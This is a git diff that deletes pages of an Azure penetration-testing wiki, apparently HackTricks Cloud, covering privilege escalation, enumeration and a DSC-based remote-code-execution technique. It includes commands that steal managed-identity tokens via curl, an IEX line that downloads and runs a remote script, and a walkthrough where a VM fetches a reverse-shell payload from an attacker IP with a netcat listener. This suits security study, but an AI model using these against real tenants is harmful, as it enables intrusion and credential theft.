-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md deleted file mode 100644 index 9b72dba49..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md +++ /dev/null @@ -1,78 +0,0 @@ -# Az - Dynamic Groups Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**. - -Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups. - -This feature requires Azure AD premium P1 license. - -## Privesc - -Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes. - -Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** - -### Example - -* **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` -* **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group - -For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft\_AAD\_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ -Unfortunately the page doesn't allow to modify the attribute values so we need to use the API: - -{% code overflow="wrap" %} -```powershell -# Login with the gust user -az login --allow-no-subscriptions - -# Get user object ID -az ad signed-in-user show - -# Update otherMails -az rest --method PATCH \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --headers 'Content-Type=application/json' \ - --body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}' - -# Verify the update -az rest --method GET \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --query "otherMails" -``` -{% endcode %} - -## References - -* [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md deleted file mode 100644 index 200b90d6d..000000000 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md +++ /dev/null @@ -1,60 +0,0 @@ -# Az - Key Vault Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Azure Key Vault - -For more information about this service check: - -{% content-ref url="../az-services/keyvault.md" %} -[keyvault.md](../az-services/keyvault.md) -{% endcontent-ref %} - -### Microsoft.KeyVault/vaults/write - -An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC). - -```bash -# If access policies in the output, then you can abuse it -az keyvault show --name - -# Get current principal ID -az ad signed-in-user show --query id --output tsv - -# Assign all permissions -az keyvault set-policy \ - --name \ - --object-id \ - --key-permissions all \ - --secret-permissions all \ - --certificate-permissions all \ - --storage-permissions all -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/README.md b/pentesting-cloud/azure-security/az-services/README.md deleted file mode 100644 index d2f2876e2..000000000 --- a/pentesting-cloud/azure-security/az-services/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# Az - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Portals - -You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/) - -### Raw requests - -#### Azure API via Powershell - -Get **access\_token** from **IDENTITY\_HEADER** and **IDENTITY\_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. - -Then query the Azure REST API to get the **subscription ID** and more . - -```powershell -$Token = 'eyJ0eX..' -$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' -# $URI = 'https://graph.microsoft.com/v1.0/applications' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# List resources and check for runCommand privileges -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: - logging.info('Python HTTP trigger function processed a request.') - IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] - IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] - cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) - val = os.popen(cmd).read() - return func.HttpResponse(val, status_code=200) -``` - -## List of Services - -**The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-acr.md b/pentesting-cloud/azure-security/az-services/az-acr.md deleted file mode 100644 index e3c5bf95c..000000000 --- a/pentesting-cloud/azure-security/az-services/az-acr.md +++ /dev/null @@ -1,76 +0,0 @@ -# Az - ACR - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services. - -### Enumerate - -To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1): - -{% code overflow="wrap" %} -```bash -# List Docker images inside the registry -IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1") - -Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2 - -Get-AzACR -username -password -registry .azurecr.io -``` -{% endcode %} - -{% tabs %} -{% tab title="az cli" %} -```bash -az acr list --output table -az acr show --name MyRegistry --resource-group MyResourceGroup -``` -{% endtab %} - -{% tab title="Az Powershell" %} -```powershell -# List all ACRs in your subscription -Get-AzContainerRegistry - -# Get a specific ACR -Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry" -``` -{% endtab %} -{% endtabs %} - -Login & Pull from the registry - -```bash -docker login .azurecr.io --username --password -docker pull .azurecr.io/: -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/pentesting-cloud/azure-security/az-services/az-application-proxy.md deleted file mode 100644 index 8b5f6c1c0..000000000 --- a/pentesting-cloud/azure-security/az-services/az-application-proxy.md +++ /dev/null @@ -1,66 +0,0 @@ -# Az - Application Proxy - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy) - -Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal. - -It works like this: - -
- -1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**. -2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device. -3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**. -4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user. -5. The connector sends the request to the **on-premises application**. -6. The **response** is sent through the connector and Application Proxy service **to the user**. - -## Enumeration - -```powershell -# Enumerate applications with application proxy configured -Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} - -# Get applications service principal -Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"} - -# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app -# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it -Get-ApplicationProxyAssignedUsersAndGroups -ObjectId -``` - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/pentesting-cloud/azure-security/az-services/az-arm-templates.md deleted file mode 100644 index b594c6aa7..000000000 --- a/pentesting-cloud/azure-security/az-services/az-arm-templates.md +++ /dev/null @@ -1,57 +0,0 @@ -# Az - ARM Templates / Deployments - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources. - -### History - -If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**. - -## Search Sensitive Info - -Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**. - -```powershell -Get-AzResourceGroup -Get-AzResourceGroupDeployment -ResourceGroupName - -# Export -Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName -cat .json # search for hardcoded password -cat | Select-String password -``` - -## References - -* [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md deleted file mode 100644 index 5f6a84345..000000000 --- a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md +++ /dev/null @@ -1,91 +0,0 @@ -# Az - State Configuration RCE - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe) - -### Summary of Remote Server (C2) Infrastructure Preparation and Steps - -#### Overview - -The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps: - -#### Step 1 — Create Files - -* **Files Required:** Two PowerShell scripts are needed: - 1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1). - 2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1). -* **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers. - -#### Step 2 — Zip Configuration File - -* The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account. - -```powershell -Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip -``` - -#### Step 3 — Set Storage Context & Upload - -* The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet. - -```powershell -Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx -``` - -#### Step 4 — Prep Kali Box - -* The Kali server downloads the RevPS.ps1 payload from a GitHub repository. - -```bash -wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1 -``` - -* The script is edited to specify the target Windows VM and port for the reverse shell. - -#### Step 5 — Publish Configuration File - -* The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM. - -#### Step 6 — Host Payload and Setup Listener - -* A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections. - -```bash -sudo python -m SimpleHTTPServer 80 -sudo nc -nlvp 443 -``` - -* The scheduled task executes the payload, achieving SYSTEM-level privileges. - -#### Conclusion - -The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md b/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md deleted file mode 100644 index b2479b6bc..000000000 --- a/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md +++ /dev/null @@ -1,86 +0,0 @@ -# Az - Management Groups, Subscriptions & Resource Groups - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Management Groups - -You can find more info about Management Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -```bash -# List -az account management-group list -# Get details and management groups and subscriptions that are children -az account management-group show --name --expand --recurse -``` - -## Subscriptions - -You can find more info about Subscriptions in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all subscriptions -az account list --output table -# Get details -az account management-group subscription show --name --subscription -``` -{% endcode %} - -## Resource Groups - -You can find more info about Resource Groups in: - -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} - -### Enumeration - -{% code overflow="wrap" %} -```bash -# List all resource groups -az group list -# Get resource groups of specific subscription -az group list --subscription "" --output table -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-queue-enum.md b/pentesting-cloud/azure-security/az-services/az-queue-enum.md deleted file mode 100644 index 03b3918bc..000000000 --- a/pentesting-cloud/azure-security/az-services/az-queue-enum.md +++ /dev/null @@ -1,117 +0,0 @@ -# Az - Queue Storage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed. - -### Enumeration - -{% tabs %} -{% tab title="Az Cli" %} -```bash -# You need to know the --account-name of the storage (az storage account list) -az storage queue list --account-name - -# Queue Metadata -az storage queue metadata show --name --account-name - -#Get ACL -az storage queue policy list --queue-name --account-name - -# Get Messages (getting a message deletes it) -az storage message get --queue-name --account-name - -# Peek Messages -az storage message peek --queue-name --account-name -``` -{% endtab %} - -{% tab title="Az PS" %} -```bash -# Get the Storage Context -$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994 -$ctx = $storageAccount.Context - -# Set Variables for Storage Account -$storageAccountName = "queuestorageaccount" - -# List Queues -Get-AzStorageQueue -Context $context -$queueName = "myqueue" - -# Retrieve a specific queue -$queue = Get-AzStorageQueue -Name $queueName -Context $context -$queue # Show the properties of the queue - -# Retrieve the access policies for the queue -$accessPolicies = Get-AzStorageQueueStoredAccessPolicy -Context $context -QueueName $queueName -$accessPolicies - -# Peek Messages -$queueMessage = $queue.QueueClient.PeekMessage() -$queueMessage.Value - -# Set the amount of time you want to entry to be invisible after read from the queue -# If it is not deleted by the end of this time, it will show up in the queue again -$visibilityTimeout = [System.TimeSpan]::FromSeconds(10) - -# Read the messages from the queue, then show the contents of the messages. -$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout) -$queueMessage.Value -``` -{% endtab %} -{% endtabs %} - -### Privilege Escalation - -{% content-ref url="../az-privilege-escalation/az-queue-privesc.md" %} -[az-queue-privesc.md](../az-privilege-escalation/az-queue-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../az-post-exploitation/az-queue-post-exploitation.md" %} -[az-queue-post-exploitation.md](../az-post-exploitation/az-queue-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../az-persistence/az-queue-persistance.md" %} -[az-queue-persistance.md](../az-persistence/az-queue-persistance.md) -{% endcontent-ref %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* 